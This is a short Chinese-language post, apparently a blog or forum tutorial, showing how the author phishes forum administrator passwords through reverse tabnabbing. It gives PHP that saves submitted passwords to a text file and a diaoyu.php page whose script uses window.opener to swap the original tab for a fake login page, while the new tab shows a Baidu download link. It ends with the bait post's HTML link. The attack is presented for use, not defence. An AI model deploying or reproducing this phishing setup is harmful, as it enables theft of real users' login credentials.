看我如何在论坛钓鱼

Jumbo

当用户点击了某个网站中带有target=”_blank”属性的超链接后，浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意，在这一瞬间，浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。

参考链接：http://www.freebuf.com/vuls/113634.html

比如我要钓鱼一个论坛的后台密码，我先把他的html保存下载，然后我添加几行代码，示例代码如下：

$content = $_POST['name']

file_put_contents('password.txt',$content);

打开以后是这样的

然后我再创建个diaoyu.php文件，事例代码如下：

<meta http-equiv="refresh"content="1;url= https://pan.baidu.com/s/1eRFAiUQ">

<script>

if(window.opener){

window.opener.location  ="http://127.0.0.1/phish.php";

}

</script>

然后比如我发个帖，发完是这样的

点击以后是新开标签页是跳到了百度盘，如图

但是刚刚的标签页跳到了phish.php页面，

如果用户不小心，看到页面确实是跳到了下载页面，以为一开始的页面刷新了，然后不小心输入密码以后，

过程

dawan

<a href="http://127.0.0.1:88/diaoyu.php" target="_blank">[url]https://pan.baidu.com/s/1eRFAiUQ[/url]</a>